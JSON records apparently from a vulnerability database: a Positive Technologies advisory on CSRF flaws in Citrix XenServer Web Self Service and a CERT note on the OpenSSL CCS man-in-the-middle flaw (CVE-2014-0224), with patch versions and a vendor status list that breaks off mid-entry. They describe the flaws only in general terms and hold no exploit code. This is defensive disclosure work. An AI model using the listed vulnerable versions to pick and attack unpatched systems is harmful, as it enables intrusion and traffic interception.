{"id": "PT-2011-31", "lastseen": "2020-06-11T19:06:49", "viewCount": 47, "bulletinFamily": "info", "cvss": {}, "edition": 4, "ptsecurityAffected": [], "type": "ptsecurity", "description": "# PT-2011-31: Multiple Cross-Site Request Forgery vulnerabilities in Citrix XenServer Web Self Service\n\n## Vulnerable software\n\nCitrix XenServer Web Self Service \nVersion: 1.1 and earlier \n\n\nLink: \n<http://www.citrix.com/English/ps2/products/feature.asp?contentID=2316933>\n\n## Severity level\n\nSeverity level: High \nImpact: Configuration modification \nAccess Vector: Remote \n\n\nCVSS v2: \nBase Score: 7.1 \nVector: (AV:N/AC:M/Au:N/C:N/I:C/A:N)\n\nCVE: not assigned\n\n## Vulnerability description\n\nThe specialists of the Positive Research center have detected \"Cross-Site Request Forgery\" vulnerabilities in Citrix XenServer Web Self Service.\n\nAll web interface forms are vulnerable to CSRF attacks. One can exploit these vulnerabilities to change the system configuration.\n\n## How to fix\n\nUpdate your software up to the latest version \n\n\n## Advisory status\n\n10.11.2011 - Vendor is notified \n10.11.2011 - Vendor gets vulnerability details \n10.03.2012 - Vendor releases fixed version and details \n28.09.2012 - Public disclosure\n\n## Credits\n\nThe vulnerability has discovered by Maxim Tsoy, Positive Research Center (Positive Technologies Company)\n\n## References\n\n<http://en.securitylab.ru/lab/PT-2011-31> \n<http://support.citrix.com/article/CTX132219> \n\n\nReports on the vulnerabilities previously discovered by Positive Research:\n\n<http://ptsecurity.com/research/advisory/> \n<http://en.securitylab.ru/lab/>\n", "title": "PT-2011-31: Multiple Cross-Site Request Forgery vulnerabilities in Citrix XenServer Web Self Service", "cvelist": [], "published": "2012-09-28T00:00:00", "references": ["http://support.citrix.com/article/CTX132219", "http://en.securitylab.ru/lab/PT-2011-31"], "reporter": "Positive Technologies", "modified": "1970-01-01T00:00:00", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2011-31/", "enchantments": {"dependencies": {"references": [{"type": "mskb", "idList": ["KB2416472", "KB2553194"]}, {"type": "cert", "idList": ["VU:978508"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29027"]}, {"type": "exploitdb", "idList": ["EDB-ID:24453"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120052"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:522F89A94E21322C3ACD5840FFF1CC99"]}, {"type": "zdt", "idList": ["1337DAY-ID-20291"]}, {"type": "openvas", "idList": ["OPENVAS:803005", "OPENVAS:1361412562310803005", "OPENVAS:1361412562310902703"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2012-066.NASL", "REDHAT-RHSA-2011-0183.NASL"]}, {"type": "ciscothreats", "idList": ["CISCO-THREAT-24111", "CISCO-THREAT-23517"]}], "modified": "2020-06-11T19:06:49", "rev": 2}, "score": {"value": 3.4, "vector": "NONE", "modified": "2020-06-11T19:06:49", "rev": 2}, "vulnersScore": 3.4}, "scheme": null}
{"cert": [{"lastseen": "2021-01-04T23:45:21", "bulletinFamily": "info", "cvelist": ["CVE-2014-0224"], "description": "### Overview \n\nOpenSSL is vulnerable to a man-in-the-middle attack.\n\n### Description \n\nThe OpenSSL security advisory states:\n\n_SSL/TLS MITM vulnerability (CVE-2014-0224)_ \n_===========================================_ \n \n_An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server._ \n \n_The attack can only be performed between a vulnerable client *and* server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution._ \n \n_OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za._ \n_OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m._ \n_OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h._ \n \n_Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC._ \n \n_The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi._ \n \nAdditional details may be found in the [OpenSSL security advisory](<https://www.openssl.org/news/secadv_20140605.txt>). This vulnerability is one of many that has been fixed in the latest release. \n \nMasashi Kikuchi has written a[ technical blog post](<http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html>) about the vulnerability. \n \n--- \n \n### Impact \n\nA remote attacker with a man-in-the-middle vantage point on the network may be able to decrypt or modify traffic between a client and server. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nOpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. \nOpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. \nOpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h. \n \n--- \n \n### Vendor Information\n\n978508\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Attachmate __ Affected\n\nNotified: June 02, 2014 Updated: August 19, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0224 OpenSSL \"CCS' MITM vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available to fix this issue. \n \nSecurity Updates technical notes are available for specific products: \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! \n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.attachmate.com/techdocs/1708.html>\n * <http://support.attachmate.com/techdocs/2288.html>\n * <http://support.attachmate.com/techdocs/2501.html>\n * <http://support.attachmate.com/techdocs/2502.html>\n * <http://support.attachmate.com/techdocs/2700.html>\n\n### Debian GNU/Linux __ Affected\n\nNotified: June 02, 2014 Updated: June 06, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <https://www.debian.org/security/2014/dsa-2950>\n\n### Fedora Project __ Affected\n\nNotified: June 02, 2014 Updated: June 06, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <https://admin.fedoraproject.org/updates/openssl-1.0.1e-38.fc19>\n\n### FreeBSD Project __ Affected\n\nNotified: June 02, 2014 Updated: June 05, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <http://www.freebsd.org/security/advisories/FreeBSD-SA-14:14.openssl.asc>\n\n### Global Technology Associates, Inc. __ Affected\n\nNotified: June 02, 2014 Updated: June 19, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version listed below.\n\nGB-OS version 6.1.0 to 6.1.7 are vulnerable and should upgrade to GB-OS 6.1.8 \nGB-OS version 6.0.0 to 6.0.8 are vulnerable and should upgrade to GB-OS 6.0.9 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Affected\n\nNotified: June 02, 2014 Updated: August 21, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Note: the current version of the following document is available here: \n<https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04401858> \n \nSUPPORT COMMUNICATION - SECURITY BULLETIN \n \nDocument ID: c04401858 \nVersion: 1 \n \nHPSBMU03101 rev.1 - HP Asset Manager, CloudSystem Chargeback, running \nOpenSSL, Remote Disclosure of Information or Unauthorized Access \n \nNOTICE: The information in this Security Bulletin should be acted upon as \nsoon as possible. \n \nRelease Date: 2014-08-19 \nLast Updated: 2014-08-19 \n \nPotential Security Impact: Remote disclosure of information or unauthorized \naccess \n \nSource: Hewlett-Packard Company, HP Software Security Response Team \n \nVULNERABILITY SUMMARY \nA potential security vulnerability has been identified with HP Asset Manager \nand CloudSystem Chargeback running OpenSSL. The vulnerability could be \nexploited remotely to allow disclosure information or unauthorized access. \n \nThis OpenSSL vulnerability was detected in specific OpenSSL versions. OpenSSL \nis a 3rd party product that is embedded with some HP Software products. This \nbulletin notifies HP Software customers about products affected by this \nOpenSSL vulnerability. \n \nNote: OpenSSL vulnerabilities, are found in the OpenSSL product cryptographic \nsoftware library product. This weakness potentially allows Man in the Middle \n(MITM) attack where the attacker can decrypt and modify traffic from the \nattacked client and server. The impacted products appear in the list below \nare vulnerable due to embedding of OpenSSL standard release software. \n \nReferences: \n \nCVE-2014-0224 (SSRT101672) \n \nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n \nHP Asset Manager - v9.4x, v9.3x, v5.2x \nHP CloudSystem Chargeback v9.40 \n \nBACKGROUND \n \nCVSS 2.0 Base Metrics \n=========================================================== \nReference Base Vector Base Score \nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 \n=========================================================== \nInformation on CVSS is documented \nin HP Customer Notice: HPSN-2008-002 \n \nRESOLUTION \n \nHP has provided the following patch to resolve the vulnerability in HP Asset \nManager and HP CloudSystem Chargeback. \n \nHP Asset Manager / CloudSystem Chargeback v9.40 \nInstall patch v9.40.P4 \n \nFor Windows(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00376> \n \nFor Windows(de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00377> \n \nFor Windows(es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00378> \n \nFor Windows(fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00379> \n \nFor Windows(it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00380> \n \nFor Windows(ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00381> \n \nFor Windows(ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00382> \n \nFor Windows(nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00383> \n \nFor Windows(pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00384> \n \nFor Windows(ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00385> \n \nFor Windows(zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00386> \n \nFor Linux(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00387> \n \nFor Linux(de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00388> \n \nFor Linux(es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00389> \n \nFor Linux(fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00390> \n \nFor Linux(it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00391> \n \nFor Linux(ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00392> \n \nFor Linux(ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00393> \n \nFor Linux(nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00394> \n \nFor Linux(pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00395> \n \nFor Linux(ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00396> \n \nFor Linux(zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00397> \n \nHP Asset Manager v9.41 \nInstall patch v9.41.P1 \n \nFor Windows(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00423> \n \nFor windows(de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00424> \n \nFor Windows(es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00425> \n \nFor Windows(fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00426> \n \nFor Windows(it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00427> \n \nFor Windows(ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00428> \n \nFor Windows(ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00429> \n \nFor Windows(nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00430> \n \nFor Windows(pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00431> \n \nFor Windows(ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00432> \n \nFor Windows(zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00433> \n \nFor Linux(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00434> \n \nFor Linux(de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00435> \n \nFor Linux(es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00436> \n \nFor Linux(fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00437> \n \nFor Linux(it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00438> \n \nFor Linux(ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00439> \n \nFor Linux(ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00440> \n \nFor Linux(nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00441> \n \nFor Linux(pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00442> \n \nFor Linux(ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00443> \n \nFor Linux(zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00444> \n \nHP Asset Manager v9.3x \nInstall patch v9.32.P2 \n \nFor Windows(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00398> \n \nFor Windows(de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00399> \n \nFor Windows(es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00400> \n \nFor Windows(fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00401> \n \nFor Windows(it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00402> \n \nFor Windows(ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00403> \n \nFor Windows(ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00404> \n \nFor Windows(nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00405> \n \nFor Windows(pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00406> \n \nFor Windows(ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00407> \n \nFor Windows(zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00408> \n \nFor Linux(en) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00409> \n \nFor Linux (de) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00410> \n \nFor Linux (es) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00411> \n \nFor Linux (fr) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00412> \n \nFor Linux (it) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00413> \n \nFor Linux (ja) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00414> \n \nFor Linux (ko) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00415> \n \nFor Linux (nl) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00416> \n \nFor Linux (pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00417> \n \nFor Linux (ru) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00418> \n \nFor Linux (zh) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00419> \n \nFor AIX ANSI (en de es fr it nl pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00420> \n \nFor HPUX ANSI (en de es fr it nl pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00421> \n \nFor Solaris ANSI (en de es fr it nl pt) \n<http://support.openview.hp.com/selfsolve/document/LID/AMGR_00422> \n \nHP Asset Manager v5.2x \nupgrade to v9.41.P1 \n \nHISTORY \nVersion:1 (rev.1) - 19 August 2014 Initial release \n \nThird Party Security Patches: Third party security patches that are to be \ninstalled on systems running HP software products should be applied in \naccordance with the customer's patch management policy. \n \nSupport: For issues about implementing the recommendations of this Security \nBulletin, contact normal HP Services support channel. For other issues about \nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n \nReport: To report a potential security vulnerability with any HP supported \nproduct, send Email to: security-alert@hp.com \n \nSubscribe: To initiate a subscription to receive future HP Security Bulletin \nalerts via Email: \n<http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins> \n \nSecurity Bulletin Archive: A list of recently released Security Bulletins is \navailable here: \n<https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/> \n \nSoftware Product Category: The Software Product Category is represented in \nthe title by the two characters following HPSB. \n \n3C = 3COM \n3P = 3rd Party Software \nGN = HP General Software \nHF = HP Hardware and Firmware \nMP = MPE/iX \nMU = Multi-Platform Software \nNS = NonStop Servers \nOV = OpenVMS \nPI = Printing and Imaging \nPV = ProCurve \nST = Storage Software \nTU = Tru64 UNIX \nUX = HP-UX \n \nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors \nor omissions contained herein. The information provided is provided \"as is\" \nwithout warranty of any kind. To the extent permitted by law, neither HP or \nits affiliates, subcontractors or suppliers will be liable for \nincidental,special or consequential damages including downtime cost; lost \nprofits; damages relating to the procurement of substitute products or \nservices; or damages for loss of data, or software restoration. The \ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced \nherein are trademarks of Hewlett-Packard Company in the United States and \nother countries. Other product and company names mentioned herein may be \ntrademarks of their respective owners.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04401858>\n\n### IBM Corporation __ Affected\n\nNotified: June 02, 2014 Updated: June 16, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the links below for more information.\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21676041>\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21676062>\n * <http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc>\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21675821>\n\n### NEC Corporation __ Affected\n\nNotified: June 02, 2014 Updated: June 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following link for more information.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-002.html>\n\n### NEC Corporation __ Affected\n\nUpdated: October 26, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL:\n\n<<http://jpn.nec.com/security-info/secinfo/nv15-011.html>>(only in Japanese) \n<<http://jpn.nec.com/security-info/av14-002.html>>(only in Japanese)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv15-011.html>\n * <http://jpn.nec.com/security-info/av14-002.html>\n\n### NVIDIA __ Affected\n\nNotified: June 02, 2014 Updated: September 10, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see `<http://nvidia.custhelp.com/app/answers/detail/a_id/3566>` for NVIDIA's statement on this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://nvidia.custhelp.com/app/answers/detail/a_id/3566>\n\n### OpenSSL __ Affected\n\nNotified: May 09, 2014 Updated: June 05, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <https://www.openssl.org/news/secadv_20140605.txt>\n\n### Oracle Corporation __ Affected\n\nNotified: June 02, 2014 Updated: June 16, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the links below for more information.\n\n### Vendor References\n\n * <http://linux.oracle.com/errata/ELSA-2014-0625.html>\n\n### Red Hat, Inc. __ Affected\n\nNotified: June 02, 2014 Updated: June 05, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <https://rhn.redhat.com/errata/RHSA-2014-0625.html>\n\n### SUSE Linux __ Affected\n\nNotified: June 02, 2014 Updated: June 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following links for more information.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2014-0224.html>\n * <http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00003.html>\n\n### Ubuntu __ Affected\n\nNotified: June 02, 2014 Updated: June 05, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the following URL for more information.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2232-1/>\n\n### VMware __ Affected\n\nNotified: June 02, 2014 Updated: June 16, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see the links below for more information.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2014-0006.html>\n\n### ACCESS Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Aruba Networks, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Blue Coat Systems Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Brocade Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Charlotte's Web Networks Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Cisco Systems, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Cray Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Engarde Secure Linux Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Extreme Networks Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fortinet, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Foundry Networks, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fujitsu Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intoto Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Mandriva S. A. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### MarkLogic Corporation Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### McAfee Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor 